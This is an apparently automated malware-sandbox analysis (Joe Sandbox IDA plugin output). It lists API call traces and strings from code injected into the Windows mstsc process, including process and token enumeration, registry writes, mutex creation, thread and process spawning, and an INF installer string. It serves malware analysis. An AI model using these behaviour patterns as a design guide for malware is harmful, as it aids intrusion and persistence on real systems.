GetProcessHeap.KERNEL32(00000008,00000013), ref: 0006A593
HeapAlloc.KERNEL32(00000000), ref: 0006A596
GetCurrentThreadId.KERNEL32 ref: 0006A5AA
LoadLibraryA.KERNEL32(?), ref: 0006A5D4
GetProcAddress.KERNEL32(00000000), ref: 0006A5DB
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A5EF
HeapFree.KERNEL32(00000000), ref: 0006A5F2
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A614
HeapFree.KERNEL32(00000000), ref: 0006A617

Strings

uTbt, xrefs: 0006A588
(0tX, xrefs: 0006A4F6

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006F5D9, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 95

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,?,7142434B,0007CD20), ref: 0006F60E
HeapAlloc.KERNEL32(00000000), ref: 0006F611
GetShellWindow.USER32 ref: 0006F62D
GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0006F678
HeapAlloc.KERNEL32(00000000), ref: 0006F67B
GetLogicalDrives.KERNEL32 ref: 0006F68F
GetModuleHandleA.KERNEL32(0006BF20,00000000), ref: 0006F6B9
GetProcAddress.KERNEL32(00000000), ref: 0006F6C0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F6D0
HeapFree.KERNEL32(00000000), ref: 0006F6DD
GetProcessHeap.KERNEL32(00000000,0006BF20), ref: 0006F6E2
HeapFree.KERNEL32(00000000), ref: 0006F6E9

Strings

DJF7, xrefs: 0006F66D
[##', xrefs: 0006F5EF

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00063199, Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 111

APIs

GetProcessHeap.KERNEL32(00000008,00000029), ref: 00063209
HeapAlloc.KERNEL32(00000000), ref: 00063210
GetCapture.USER32 ref: 0006321F
HeapFree.KERNEL32(00000000), ref: 000632F0

Part of subcall function 0006B964: Sleep.KERNEL32(000003E8,?,00000000,00000000,00000000,00072000,00000000,00000000,?,?,?,0006329E), ref: 0006B9AC

Sleep.KERNEL32(-0000EA60), ref: 000632C2
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000632E9

Strings

-3hc, xrefs: 000631E2
zZb~, xrefs: 000631F0
IFNo, xrefs: 000631FE
~w_T, xrefs: 000631F7
0e{u, xrefs: 000631E9
1/!&, xrefs: 000631BF
T, xrefs: 00063205

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 000667FB, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 102

APIs

GetProcessHeap.KERNEL32(00000008,00000089), ref: 000668BE
HeapAlloc.KERNEL32(00000000), ref: 000668C5
CountClipboardFormats.USER32 ref: 000668D6
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 0006690F
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 00066934
CloseHandle.KERNEL32(00000000), ref: 00066943
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006694E
HeapFree.KERNEL32(00000000), ref: 00066955

Strings

tnE79, xrefs: 000668F3
17\t, xrefs: 00066874
*7Jt, xrefs: 00066897
(7kt, xrefs: 00066835
\tnE, xrefs: 000668AC

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 000673B6, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 94

APIs

GetProcessHeap.KERNEL32(00000008,0000000E,?,7142434B,00106D80), ref: 000673EF
HeapAlloc.KERNEL32(00000000), ref: 000673F2
GetLogicalDrives.KERNEL32 ref: 00067406
GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00067460
HeapAlloc.KERNEL32(00000000), ref: 00067463
IsSystemResumeAutomatic.KERNEL32 ref: 00067477
GetModuleHandleA.KERNEL32(00000000,?), ref: 000674A8
GetProcAddress.KERNEL32(00000000), ref: 000674AF
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000674BE
HeapFree.KERNEL32(00000000), ref: 000674C7
GetProcessHeap.KERNEL32(00000000,?), ref: 000674CC
HeapFree.KERNEL32(00000000), ref: 000674CF

Strings

qBc2, xrefs: 00067455

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006EE9B, Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 70

APIs

GetProcessHeap.KERNEL32(00000008,00000061,76AD46E9,7142434B,76E6FE8D), ref: 0006EF0F
HeapAlloc.KERNEL32(00000000), ref: 0006EF12
GetForegroundWindow.USER32 ref: 0006EF23
OpenMutexW.KERNEL32(001F0001,00000000,00000000), ref: 0006EF58
CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 0006EF6B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006EF73
HeapFree.KERNEL32(00000000), ref: 0006EF76
ExitProcess.KERNEL32 ref: 0006EF84

Strings

KCBqiNhR7x, xrefs: 0006EE9B
OJG6, xrefs: 0006EF02
36.L, xrefs: 0006EEE6
#6zL, xrefs: 0006EEFB
'J56, xrefs: 0006EEED

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00061560, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 107

APIs

Part of subcall function 00061000: GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,?,?,?), ref: 0006107A
Part of subcall function 00061000: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00061992), ref: 0006107D
Part of subcall function 00061000: wsprintfW.USER32 ref: 00061093
Part of subcall function 00061000: lstrlenW.KERNEL32(00000000), ref: 000610A7
Part of subcall function 00061000: GetProcessHeap.KERNEL32(00000008,00000000), ref: 000610B7
Part of subcall function 00061000: HeapAlloc.KERNEL32(00000000), ref: 000610BA
Part of subcall function 00061000: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 000610D1
Part of subcall function 00061000: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000610F4
Part of subcall function 00061000: HeapFree.KERNEL32(00000000), ref: 000610FB

StrDupW.SHLWAPI(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00061992), ref: 0006158B
GetProcessHeap.KERNEL32(00000008,00000015), ref: 000615D6
HeapAlloc.KERNEL32(00000000), ref: 000615D9
GetClipboardViewer.USER32 ref: 000615E8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00061639
HeapFree.KERNEL32(00000000), ref: 0006163C

Part of subcall function 0006DD0B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0006DD37
Part of subcall function 0006DD0B: GetLastError.KERNEL32(?,?,?,?,00061970,?), ref: 0006DD44
Part of subcall function 0006DD0B: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0006DD6B
Part of subcall function 0006DD0B: SetEndOfFile.KERNEL32(00000000,?,?,?,?,00061970,?), ref: 0006DD76
Part of subcall function 0006DD0B: GetLastError.KERNEL32(?,?,?,?,00061970,?), ref: 0006DD80
Part of subcall function 0006DD0B: SetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,00061970,?), ref: 0006DD95
Part of subcall function 0006DD0B: CloseHandle.KERNEL32(00000000), ref: 0006DD9C
Part of subcall function 0006DD0B: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00061970,?), ref: 0006DDA9
Part of subcall function 0006DD0B: HeapFree.KERNEL32(00000000), ref: 0006DDB0

HeapFree.KERNEL32(00000000), ref: 0006167D

Part of subcall function 0006110C: GetProcessHeap.KERNEL32(00000008,0000003D,00000000,76E6FE8D,00000000), ref: 00061176
Part of subcall function 0006110C: HeapAlloc.KERNEL32(00000000), ref: 00061179
Part of subcall function 0006110C: CountClipboardFormats.USER32 ref: 0006119F
Part of subcall function 0006110C: GetProcessHeap.KERNEL32(00000008,000000C1), ref: 000612C8
Part of subcall function 0006110C: HeapAlloc.KERNEL32(00000000), ref: 000612CB
Part of subcall function 0006110C: GetDialogBaseUnits.USER32 ref: 000612EA
Part of subcall function 0006110C: GetProcessHeap.KERNEL32(00000008,00000019,00020006), ref: 00061356
Part of subcall function 0006110C: HeapAlloc.KERNEL32(00000000), ref: 00061359
Part of subcall function 0006110C: GetDialogBaseUnits.USER32 ref: 00061372
Part of subcall function 0006110C: GetProcessHeap.KERNEL32(00000008,00000019), ref: 000613C4
Part of subcall function 0006110C: HeapAlloc.KERNEL32(00000000), ref: 000613C7
Part of subcall function 0006110C: GetCurrentThreadId.KERNEL32 ref: 000613E0
Part of subcall function 0006110C: GetProcessHeap.KERNEL32(00000008,00000025), ref: 0006143F
Part of subcall function 0006110C: HeapAlloc.KERNEL32(00000000), ref: 00061442
Part of subcall function 0006110C: ReleaseCapture.USER32 ref: 00061458
Part of subcall function 0006110C: RegSetValueExW.ADVAPI32(00000006,?,00000000,00000004,00000001,00000004), ref: 0006149A
Part of subcall function 0006110C: RegSetValueExW.ADVAPI32(00000006,774C5173,00000000,00000001,?,?), ref: 000614CE
Part of subcall function 0006110C: RegSetValueExW.ADVAPI32(00000006,00000000,00000000,00000001,?,?), ref: 00061500
Part of subcall function 0006110C: RegCloseKey.ADVAPI32(00000006), ref: 00061505
Part of subcall function 0006110C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00061515
Part of subcall function 0006110C: HeapFree.KERNEL32(00000000), ref: 0006151E
Part of subcall function 0006110C: GetProcessHeap.KERNEL32(00000000,774C5173), ref: 00061524
Part of subcall function 0006110C: HeapFree.KERNEL32(00000000), ref: 00061527
Part of subcall function 0006110C: GetProcessHeap.KERNEL32(00000000,?), ref: 0006152D
Part of subcall function 0006110C: HeapFree.KERNEL32(00000000), ref: 00061530
Part of subcall function 0006110C: GetProcessHeap.KERNEL32(00000000,00000000,00020006), ref: 00061542
Part of subcall function 0006110C: HeapFree.KERNEL32(00000000), ref: 0006154B
Part of subcall function 0006110C: GetProcessHeap.KERNEL32(00000000,?), ref: 00061551
Part of subcall function 0006110C: HeapFree.KERNEL32(00000000), ref: 00061554

GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00061992), ref: 0006166C
HeapFree.KERNEL32(00000000), ref: 0006166F
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00061992), ref: 0006167A

Strings

HX82, xrefs: 000615B5
fXQ2, xrefs: 000615C9

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006BF00, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 113

APIs

Part of subcall function 0006F5D9: GetProcessHeap.KERNEL32(00000008,0000000B,?,7142434B,0007CD20), ref: 0006F60E
Part of subcall function 0006F5D9: HeapAlloc.KERNEL32(00000000), ref: 0006F611
Part of subcall function 0006F5D9: GetShellWindow.USER32 ref: 0006F62D
Part of subcall function 0006F5D9: GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0006F678
Part of subcall function 0006F5D9: HeapAlloc.KERNEL32(00000000), ref: 0006F67B
Part of subcall function 0006F5D9: GetLogicalDrives.KERNEL32 ref: 0006F68F
Part of subcall function 0006F5D9: GetModuleHandleA.KERNEL32(0006BF20,00000000), ref: 0006F6B9
Part of subcall function 0006F5D9: GetProcAddress.KERNEL32(00000000), ref: 0006F6C0
Part of subcall function 0006F5D9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F6D0
Part of subcall function 0006F5D9: HeapFree.KERNEL32(00000000), ref: 0006F6DD
Part of subcall function 0006F5D9: GetProcessHeap.KERNEL32(00000000,0006BF20), ref: 0006F6E2
Part of subcall function 0006F5D9: HeapFree.KERNEL32(00000000), ref: 0006F6E9

Part of subcall function 0006BB40: GetProcessHeap.KERNEL32(00000008,00000250,?,7142434B,0007CD20), ref: 0006BB67
Part of subcall function 0006BB40: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20,0007CD24), ref: 0006BB70
Part of subcall function 0006BB40: GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20), ref: 0006BB86
Part of subcall function 0006BB40: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20,0007CD24), ref: 0006BB89
Part of subcall function 0006BB40: GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20), ref: 0006BB9D
Part of subcall function 0006BB40: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20,0007CD24), ref: 0006BBA0
Part of subcall function 0006BB40: GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0006BBE4
Part of subcall function 0006BB40: HeapAlloc.KERNEL32(00000000), ref: 0006BBE7
Part of subcall function 0006BB40: ReleaseCapture.USER32 ref: 0006BBF9
Part of subcall function 0006BB40: GetSystemDirectoryW.KERNEL32(0007CD24,00000103), ref: 0006BC4D
Part of subcall function 0006BB40: lstrcatW.KERNEL32(0007CD24,00000000), ref: 0006BC84
Part of subcall function 0006BB40: FindFirstFileW.KERNEL32(0007CD24,?), ref: 0006BC8E
Part of subcall function 0006BB40: StrRChrW.SHLWAPI(?,00000000,0000002E), ref: 0006BCD3
Part of subcall function 0006BB40: FindNextFileW.KERNEL32(?,?), ref: 0006BD84
Part of subcall function 0006BB40: FindFirstFileW.KERNEL32(0007CD24,?), ref: 0006BD90
Part of subcall function 0006BB40: FindClose.KERNEL32(?), ref: 0006BDC4
Part of subcall function 0006BB40: GetProcessHeap.KERNEL32(00000000,7142434B), ref: 0006BDDB
Part of subcall function 0006BB40: HeapFree.KERNEL32(00000000), ref: 0006BDDE
Part of subcall function 0006BB40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006BDE8
Part of subcall function 0006BB40: HeapFree.KERNEL32(00000000), ref: 0006BDEB
Part of subcall function 0006BB40: GetProcessHeap.KERNEL32(00000000,0007CD24,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20), ref: 0006BDFA
Part of subcall function 0006BB40: HeapFree.KERNEL32(00000000), ref: 0006BDFD
Part of subcall function 0006BB40: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20), ref: 0006BE07
Part of subcall function 0006BB40: HeapFree.KERNEL32(00000000), ref: 0006BE0A

GetProcessHeap.KERNEL32(00000008,00000015,?,?,?,?,?,?,?,7142434B,00106D80), ref: 0006BF97
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,7142434B,00106D80), ref: 0006BF9A
GetFocus.USER32 ref: 0006BFAB
lstrcatW.KERNEL32(00000000), ref: 0006BFDE
GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,7142434B,00106D80), ref: 0006C012
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,7142434B,00106D80), ref: 0006C042
HeapFree.KERNEL32(00000000), ref: 0006C045

Strings

CMVA, xrefs: 0006BF78
yrx), xrefs: 0006C00B
5m(3, xrefs: 0006BF7F
mM3A, xrefs: 0006BF8C

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00066F1E, Relevance: 18.1, APIs: 12, Instructions: 133

APIs

FindAtomW.KERNEL32(?), ref: 00066F8C
AddAtomW.KERNEL32(?), ref: 00066FA2
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00066FAC
HeapAlloc.KERNEL32(00000000), ref: 00066FB3
OpenProcess.KERNEL32(00100410,00000000,?), ref: 0006701E
GetProcessImageFileNameA.PSAPI(00000000,?,00000104), ref: 00067037
CloseHandle.KERNEL32(00000000), ref: 0006703E
lstrlenA.KERNEL32(?), ref: 00067051
lstrlenA.KERNEL32(?), ref: 0006705E

Part of subcall function 0006E545: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,0006E667), ref: 0006E55F
Part of subcall function 0006E545: GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,?,0006E667), ref: 0006E58D
Part of subcall function 0006E545: HeapAlloc.KERNEL32(00000000,?,0006E667), ref: 0006E594
Part of subcall function 0006E545: GetProcessHeap.KERNEL32(00000000,00000000,?,0006E667), ref: 0006E5E9
Part of subcall function 0006E545: HeapFree.KERNEL32(00000000,?,0006E667), ref: 0006E5F0

Part of subcall function 00064AB4: OpenProcess.KERNEL32(00000400,00000000), ref: 00064AFF
Part of subcall function 00064AB4: GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 00064B21
Part of subcall function 00064AB4: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00064B58
Part of subcall function 00064AB4: HeapAlloc.KERNEL32(00000000), ref: 00064B5F
Part of subcall function 00064AB4: GetForegroundWindow.USER32 ref: 00064B70
Part of subcall function 00064AB4: wsprintfA.USER32 ref: 00064BAD
Part of subcall function 00064AB4: FindAtomA.KERNEL32(?), ref: 00064BBD
Part of subcall function 00064AB4: GlobalFindAtomA.KERNEL32(?), ref: 00064BD2
Part of subcall function 00064AB4: GlobalAddAtomA.KERNEL32(?), ref: 00064BE4
Part of subcall function 00064AB4: AddAtomA.KERNEL32(?), ref: 00064BF1
Part of subcall function 00064AB4: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064BFD
Part of subcall function 00064AB4: HeapFree.KERNEL32(00000000), ref: 00064C04
Part of subcall function 00064AB4: CloseHandle.KERNEL32(?), ref: 00064C0D

Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006487E
Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 00064881
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006489A
Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 0006489D
Part of subcall function 0006485C: OpenProcess.KERNEL32(00000400,00000000), ref: 000648D1
Part of subcall function 0006485C: OpenProcessToken.ADVAPI32(00000000,00020008,00000000), ref: 00064907
Part of subcall function 0006485C: ProcessIdToSessionId.KERNEL32(?,?), ref: 00064921
Part of subcall function 0006485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,00000000,?), ref: 00064942
Part of subcall function 0006485C: GetLastError.KERNEL32 ref: 00064944
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,?), ref: 00064958
Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 0006495B
Part of subcall function 0006485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,?,?), ref: 00064979
Part of subcall function 0006485C: LookupAccountSidW.ADVAPI32(00000000,?,?,00000104,?,00000104,?), ref: 0006499D
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00064A0C
Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 00064A0F
Part of subcall function 0006485C: GetCursor.USER32 ref: 00064A20
Part of subcall function 0006485C: wsprintfW.USER32 ref: 00064A53
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064A6C
Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A75
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00064A7C
Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A7F
Part of subcall function 0006485C: CloseHandle.KERNEL32(00000000), ref: 00064A84
Part of subcall function 0006485C: CloseHandle.KERNEL32(?), ref: 00064A8D
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00064A9B
Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A9E
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064AA3
Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064AA6

StrCmpIW.SHLWAPI(?,0007CAB0), ref: 000670AB
CreateThread.KERNEL32(00000000,00000000,Function_00004D73,?,00000000,00000000), ref: 000670BF
CloseHandle.KERNEL32(00000000), ref: 000670C6

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00061000, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108

APIs

Part of subcall function 0006A626: GetProcessHeap.KERNEL32(00000008,0000006D,?,00000000,00000000), ref: 0006A6B0
Part of subcall function 0006A626: HeapAlloc.KERNEL32(00000000), ref: 0006A6B3
Part of subcall function 0006A626: GetCurrentThreadId.KERNEL32 ref: 0006A6C5
Part of subcall function 0006A626: GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0006A717
Part of subcall function 0006A626: HeapAlloc.KERNEL32(00000000), ref: 0006A71A
Part of subcall function 0006A626: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A766
Part of subcall function 0006A626: HeapFree.KERNEL32(00000000), ref: 0006A76D

GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,?,?,?), ref: 0006107A
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00061992), ref: 0006107D
wsprintfW.USER32 ref: 00061093
lstrlenW.KERNEL32(00000000), ref: 000610A7
GetProcessHeap.KERNEL32(00000008,00000000), ref: 000610B7
HeapAlloc.KERNEL32(00000000), ref: 000610BA
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 000610D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000610F4
HeapFree.KERNEL32(00000000), ref: 000610FB

Strings

[Version]signature = "$CHICAGO$"AdvancedINF = 2.5, "You need a new version of advpack.dll"[DefaultInstall]RunPreSetupCom, xrefs: 0006108A

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006BE1A, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 72

APIs

GetProcessHeap.KERNEL32(00000008,0000000E,76E645DF,00000000,76E6FE8D), ref: 0006BE64
HeapAlloc.KERNEL32(00000000), ref: 0006BE6B
GetFocus.USER32 ref: 0006BE7C
GetEnvironmentVariableA.KERNEL32(00000000,?,00000104), ref: 0006BEB5
lstrlenA.KERNEL32(?), ref: 0006BEC9
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006BEEA
HeapFree.KERNEL32(00000000), ref: 0006BEF1

Strings

KCBqiNhR7x, xrefs: 0006BE1A
-&?7, xrefs: 0006BE37
ZXqx, xrefs: 0006BE57

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00067294, Relevance: 16.6, APIs: 11, Instructions: 101

APIs

WaitForSingleObject.KERNEL32(000000FF), ref: 000672AF
GetCurrentProcessId.KERNEL32 ref: 000672D7

Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006487E
Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 00064881
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006489A
Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 0006489D
Part of subcall function 0006485C: OpenProcess.KERNEL32(00000400,00000000), ref: 000648D1
Part of subcall function 0006485C: OpenProcessToken.ADVAPI32(00000000,00020008,00000000), ref: 00064907
Part of subcall function 0006485C: ProcessIdToSessionId.KERNEL32(?,?), ref: 00064921
Part of subcall function 0006485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,00000000,?), ref: 00064942
Part of subcall function 0006485C: GetLastError.KERNEL32 ref: 00064944
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,?), ref: 00064958
Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 0006495B
Part of subcall function 0006485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,?,?), ref: 00064979
Part of subcall function 0006485C: LookupAccountSidW.ADVAPI32(00000000,?,?,00000104,?,00000104,?), ref: 0006499D
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00064A0C
Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 00064A0F
Part of subcall function 0006485C: GetCursor.USER32 ref: 00064A20
Part of subcall function 0006485C: wsprintfW.USER32 ref: 00064A53
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064A6C
Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A75
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00064A7C
Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A7F
Part of subcall function 0006485C: CloseHandle.KERNEL32(00000000), ref: 00064A84
Part of subcall function 0006485C: CloseHandle.KERNEL32(?), ref: 00064A8D
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00064A9B
Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A9E
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064AA3
Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064AA6

GetProcessHeap.KERNEL32(00000008,0000000C), ref: 000672E6
HeapAlloc.KERNEL32(00000000), ref: 000672ED
GetCurrentProcessId.KERNEL32 ref: 00067300
CreateThread.KERNEL32(00000000,00000000,Function_00006C88,00000000,00000000,00000000), ref: 00067311
CloseHandle.KERNEL32(00000000), ref: 00067318
CreateThread.KERNEL32(00000000,00000000,Function_000070D8,00000000,00000000,00000000), ref: 00067368
CloseHandle.KERNEL32(00000000), ref: 0006736F

Part of subcall function 0006E0EF: GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,00106D80), ref: 0006E140
Part of subcall function 0006E0EF: HeapAlloc.KERNEL32(00000000), ref: 0006E143
Part of subcall function 0006E0EF: GetShellWindow.USER32 ref: 0006E155
Part of subcall function 0006E0EF: GetProcessHeap.KERNEL32(00000008,0000001A), ref: 0006E1BD
Part of subcall function 0006E0EF: HeapAlloc.KERNEL32(00000000), ref: 0006E1C0
Part of subcall function 0006E0EF: ReleaseCapture.USER32 ref: 0006E1D4
Part of subcall function 0006E0EF: LoadLibraryA.KERNEL32(?), ref: 0006E1FE
Part of subcall function 0006E0EF: GetProcAddress.KERNEL32(00000000), ref: 0006E205
Part of subcall function 0006E0EF: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E219
Part of subcall function 0006E0EF: HeapFree.KERNEL32(00000000), ref: 0006E222
Part of subcall function 0006E0EF: GetProcessHeap.KERNEL32(00000000,?), ref: 0006E227
Part of subcall function 0006E0EF: HeapFree.KERNEL32(00000000), ref: 0006E22A
Part of subcall function 0006E0EF: NtQuerySystemInformation.NTDLL(00000005,00000000,00000000,7142434B,?,00000000,00106D80), ref: 0006E240
Part of subcall function 0006E0EF: VirtualAlloc.KERNELBASE(00000000,7142424B,00003000,00000004), ref: 0006E261
Part of subcall function 0006E0EF: NtQuerySystemInformation.NTDLL(00000005,00000000,7142434B,00000000), ref: 0006E276
Part of subcall function 0006E0EF: VirtualFree.KERNEL32(?,00000000,00008000), ref: 0006E2E1

Sleep.KERNEL32(000003E8), ref: 0006739E
Sleep.KERNEL32(0000001E), ref: 000673A2

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006D9F1, Relevance: 16.6, APIs: 11, Instructions: 94

APIs

Part of subcall function 0006D97F: ExpandEnvironmentStringsW.KERNEL32(00106D80,00000000,00000000,00106D80,00106D80,00106D80,00106D80,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?), ref: 0006D991
Part of subcall function 0006D97F: GetProcessHeap.KERNEL32(00000008,00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x), ref: 0006D9AB
Part of subcall function 0006D97F: HeapAlloc.KERNEL32(00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006D9B2
Part of subcall function 0006D97F: ExpandEnvironmentStringsW.KERNEL32(00106D80,00000000,7142434B,00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?), ref: 0006D9CD
